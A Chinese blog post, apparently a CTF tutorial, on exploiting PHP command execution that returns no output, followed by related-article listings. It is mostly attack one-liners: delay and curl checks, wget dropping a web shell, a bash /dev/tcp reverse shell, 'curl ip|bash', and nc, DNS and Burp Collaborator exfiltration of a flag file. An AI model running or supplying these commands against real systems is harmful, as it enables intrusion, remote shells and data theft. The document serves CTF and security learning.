[CTF]命令执行无回显利用

最新推荐文章于 2024-06-02 23:54:38 发布
最新推荐文章于 2024-06-02 23:54:38 发布
阅读量7.5k 收藏 19
点赞数 8
分类专栏: Web安全 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cosmoslin/article/details/123039067
版权

背景

exec,shell_exec等函数可以执行命令但没有回显,我们需要寻找方法来得到命令执行后的结果

<?php 
   highlight__file(__FILE__)
   shell_exec($_GET[cmd]);
    ?>

判断命令是否执行

延时

利用sleep函数

cmd=ls|sleep 5

HTTP请求

目标主机通过向VPS发起HTTP请求,VPS监听到请求则代表命令执行成功(注意:ping命令不产生http请求)

VPS:nc -lvp 8888

目标主机:cmd=curl ip:8888

DNS请求

利用dnslog

利用方式

直接写入

利用cp命令:cp flag.php 1.txt

利用mv命令:mv flag.php 1.txt

利用>输出结果到文件:ls > 1.txt

利用wget下载:wget http://ip/shell.txt > shell.php或者wget http://ip/shell.txt -O shell.php

反弹shell

bash反弹

目标主机:

bash -i >& /dev/tcp/ip/8888 0>&1

VPS:

nc -lvp 8888

也可以将命令写入文件,之后在存在命令执行的地方输入curl ip|bash即可反弹

外带数据

使用ceye或者dnslog

cmd=curl `命令`.域名

nc外带

目标主机:nc ip 8888 < flag.php
VPS:nc -lvp 8888

当tcp不能使用,-u参数调整为udp

目标主机:nc -u ip 8888 < flag.php
VPS:nc -ulvp 8888

burp(Collaborator Client)

使用curl -F将flag文件上传到Burp的Collaborator Client(Collaborator Client 类似DNSLOG,其功能要比DNSLOG强大,主要体现在可以查看POST请求包以及打Cookies)(-X指定发送一个POST请求,-F指定要发送的文件)

获取Collaborator Client分配给BURP的链接:

打开Burp主界面 -->菜单(Burp)-->Burp Collaboraor Client -- > 点击 Copy to Clipboard

目标主机:

cmd=curl -X POST -F xx=@flag.php http://jj6xpgxristzkbn1fpkl32t6jxpndc.burpcollaborator.net

image-20220221013752788

参考:

https://blog.csdn.net/weixin_33164837/article/details/112421828

https://h0ld1rs.github.io/2021/06/24/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%97%A0%E5%9B%9E%E6%98%BE/#burp-Collaborator-Client

Snakin_ya
关注
  • 8
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTF入门web篇18命令执行回显的判断方法及dnslog相关例题
anquanniu的博客
10-19 4495
命令执行判断 命令执行可能会存在命令执行完没有回显,首先要判断命令是否有执行,可以通过三种方式来判断:延时、HTTP请求、DNS请求。 1、 延时 无延时无回显 有延时无回显 通过是否延时来判断该条命令是否有执行,有延时则代表命令执行。(”sleep 3”表示延时3秒) 2、 HTTP请求 目标机通过向公网可通信的机子发起http请求,而这个公网可通信的机子是我们可控的,则当该公网机子收到h...
一招迅速搞定无回显函数shell_exec
csjjjd的博客
12-14 588
今天带大家学习一下在CTF命令执行时遇到无回显怎么办?这里拿一道题目举例:这道题是不是很简单,直接???hp不就可以了吗?
php--无回显情况下的命令执行
最新发布
金灰的博客
06-02 1251
免责声明:本文仅做技术交流与学习...建立通道(信道) --数据传输的路径shell_exec 与 system 相比,shell_exec没有回显结果.
CTF命令执行及绕过技巧
热门推荐
JBlock的博客
03-07 2万+
前言 今天是代码审计部分的一个技巧补充!前些阵子做了sql注入回顾篇系列!今天开启php代码审计系列! 今天内容主要是CTF命令注入及绕过的一些技巧!以及构成RCE的一些情景! 文章目录前言正文代码执行代码执行的几种方式命令执行常见命令执行函数绕过姿势敏感字符绕过处理无回显命令执行Think one Think 正文 在详细介绍命令注入之前,有一点需要注意:命令注入与远程代码执行不同。他们的区...
命令执行命令执行漏洞无回显如何渗透
wj33333的博客
11-21 575
命令执行漏洞无回显如何渗透
从无回显命令执行到getshell的渗透测试
Javachichi的博客
06-02 735
事情起源于一次渗透测试,机缘巧合之下,发现了一个PHP imap远程命令执行的漏洞点。但尴尬的是,这块命令执行并不会有回显,由此开始了今天的探测之旅。
CTF命令执行RCE
qq_53099119的博客
04-02 2629
md5() 函数计算字符串的 MD5 散列。md5() 函数使用 RSA 数据安全,包括 MD5 报文摘要算法。来自 RFC 1321 的解释 - MD5 报文摘要算法:MD5 报文摘要算法将任意长度的信息作为输入值,并将其换算成一个 128 位长度的"指纹信息"或"报文摘要"值来代表这个输入值,并以换算后的值作为结果。MD5 算法主要是为数字签名应用程序而设计的;
BUUCTF 之 [ACTF2020 新生赛]Exec(命令执行漏洞)
两个月亮
01-08 1243
这界面和这网页标题结合起来,相信给位都能猜到这个靶场中很有可能存在命令执行漏洞。文件往往位于根目录下,但也不要被反套路了。可以看到并没有我们期望的文件。这些文件夹都不需要管它,在。
php中shell_exec,php中shell_exec() 与 exec()函数的区别
weixin_31880383的博客
03-17 3359
shell_exec()函数是PHP中的一个内置函数,用于通过shell执行命令并以字符串的形式返回完整的输出。shell_exec是backtick操作符的别名,用于*nix。如果命令失败,则返回NULL,并且这些值对于错误检查不可靠。语法:string shell_exec( $cmd )参数:此函数接受单个参数$cmd,该参数用于保存将要执行命令。返回值:此函数返回已执行命令,如果发生错...
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
php突破命令限制执行系统命令
05-09
php突破命令限制执行系统命令 可以用于ctf 实战 等多领域使用 十分实用,可以用于突破system等命令被限制的时候
符号执行angr解ctf逆向题组
12-28
符号执行是一种在软件分析和逆向工程中广泛使用的高级技术,尤其在解决CTF(Capture The Flag)竞赛中的逆向题目时。它主要用于探索程序的所有可能执行路径,从而理解和分析程序的行为。`angr`是一个强大的开源软件...
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
CTF相关命令使用
01-21
了解CTF见到的非常不错的素材资源,这个是关于网络设置较多的文档
CTFHUB-RCE通关记录以及常见的绕过过滤的方法
不想当脚本小子的脚本小子
03-21 2148
先过关,再分析相关的防御源代码 1.过滤cat 然后cat 301472130920273.php然后查看网页源代码即可得到flag 2.过滤cat 根据题目要求过滤了cat 而该服务器为Linux系统区分大小写 就无法通过大小写来绕过 本来想使用vi命令替换cat命令也能查看到flag中的内容 但是失败了 最后用了替换法:127.0.0.0 ; $a=ca;$b=t; $a$b flagxxxx 题目源码: <?php $res = FALSE; if (is.
CTFHub | 命令注入
尼泊罗河伯的博客
06-14 1439
检查网页显示内容,可以直接看到源代码。大致意思是:检查用户输入的 GET 请求,判断用户是否输入了ip 信息。如果输入了 ip 信息,则使用用户输入的这个 ip 数据执行一个 shell 命令 "ping -c 4" 。
CTFweb命令执行知识点
cutesharkl的博客
07-08 688
命令注入:命令注入是一种常见的命令执行漏洞,攻击者可以通过将恶意命令注入到应用程序中的用户输入来执行系统命令命令执行的原理:命令执行漏洞通常发生在应用程序未正确过滤、验证或转义用户输入的情况下。输入验证与过滤:对于用户输入,应该进行必要的验证和过滤,以防止恶意输入进入命令执行函数。操作系统命令命令执行漏洞通常发生在应用程序中执行操作系统命令的函数上。绕过技巧:在实际的命令执行漏洞利用中,可能需要使用一些技巧来绕过安全机制。操作系统特定命令命令执行漏洞也可能与特定的操作系统相关。
攻防_漏洞_命令执行_php命令执行
redglare的博客
10-21 577
php 命令执行
shell脚本执行无结果回显事件
knightjsh的博客
02-28 3884
有些指令在Linux命令行中明明可以直接执行,为什么但写入shell脚本中却没有回显呢? 正常情况应该是可以在命令执行的指令,在shell脚本中用``(返单引号)囊括起来便可执行。非正常情况,命令行可执行,shell脚本中执行回显。 在Linux中有外部命令和内置命令的区分,具体内容可到文章底部附录查看。区分方法:通过which指令,回显结果为no的都是bash内置命令。 同样的脚本,在其他人系统上可能是没有问题的,题主使用的是centos7,也有群友使用centos7可以成功执行脚本。
ctf 监听端口_浅谈ctf中的无回显
06-10
CTF中的无回显指的是无法直接从应用程序输出或网络流量中获取结果的情况。在某些情况下,CTF比赛的参赛者需要在没有回显的情况下解决一些问题,例如监听某个端口。 在CTF中,监听端口通常意味着需要在某个特定的端口上监听并接受传入的连接。这可能需要编写一个简单的服务或服务器程序来监听该端口,等待连接并对其进行处理。 在无回显的情况下,参赛者无法直接看到他们的输入是否产生了任何输出。这意味着他们需要尝试不同的输入来确定他们的输入是否被正确处理。这需要一些技巧和经验,因为他们必须根据一些指示或假设来尝试输入,以便找到正确的答案。 因此,在CTF中,无回显是一种常见的情况,需要参赛者具备一定的技巧和经验才能成功地解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Snakin_ya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值